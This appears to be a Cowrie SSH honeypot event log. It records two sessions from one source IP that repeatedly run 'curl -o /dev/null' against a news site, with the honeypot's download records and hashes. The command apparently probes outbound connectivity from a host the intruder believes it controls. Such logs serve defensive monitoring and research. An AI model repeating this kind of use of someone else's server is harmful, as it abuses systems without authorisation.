{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.803390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.830453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.831853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.834873Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.843427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.844846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.870874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.872102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.877435Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.884550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.885532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.887623Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.894229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.908075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.909103Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.921758Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.923290Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.924419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.944490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.945749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.950248Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.967235Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.968425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.992754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.993870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.017563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.019150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.037188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.038373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.066875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.068485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.080289Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.088607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.089413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.099099Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.127286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.135852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.137215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.144292Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.145254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.174417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.175955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.181372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.182528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.200945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.215775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.216686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.222910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.223890Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.253530Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.266813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.267900Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.272719Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.274224Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.275180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.303916Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.307956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.323183Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.324273Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.329227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.330182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.346781Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.370205Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.371605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.374918Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.376220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.380561Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.386285Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.409345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.410701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.413512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.414947Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.429511Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.430200Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.450127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.451261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.453468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.454520Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.481426Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.492636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.493803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.500773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.501990Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.529063Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.537066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.538230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.544593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.545557Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.558047Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.585306Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.586613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.593816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.594882Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.629915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.631310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.636374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.637280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.667478Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.669575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.671015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.680012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.681263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.688336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.694107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.712914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
